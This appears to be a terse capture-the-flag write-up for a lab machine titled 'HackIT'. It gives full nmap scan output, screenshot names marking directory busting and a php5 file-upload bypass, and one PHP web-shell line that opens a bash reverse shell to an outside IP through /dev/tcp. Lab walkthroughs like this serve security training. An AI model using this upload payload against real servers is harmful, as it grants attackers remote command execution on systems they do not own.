Nmap scan

$ nmap -A -T4 -vv -oN nmapscan_topports -Pn 10.10.133.166
Nmap scan report for 10.10.133.166
Host is up, received user-set (0.22s latency).
Scanned at 2023-06-18 11:02:56 EDT for 45s
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE  REASON      VERSION
22/tcp   open     ssh      syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
|   256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC4fnU3h1O9PseKBbB/6m5x8Bo3cwSPmnfmcWQAVN93J
80/tcp   open     http     syn-ack     Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
427/tcp  filtered svrloc   no-response
545/tcp  filtered ekshell  no-response
992/tcp  filtered telnets  no-response
1187/tcp filtered alias    no-response
2394/tcp filtered ms-olap2 no-response
4126/tcp filtered ddrepl   no-response
5101/tcp filtered admdog   no-response
7920/tcp filtered unknown  no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sun Jun 18 11:03:41 2023 -- 1 IP address (1 host up) scanned in 45.31 seconds

website.png

gobuster_directory_busting.png

panel.png

phpupload.png

php5upload.png

uploads.png

<?php echo shell_exec('bash -c "bash -i >& /dev/tcp/10.17.49.224/9966 0>&1"'); ?>

uploaded.png

user_shell.png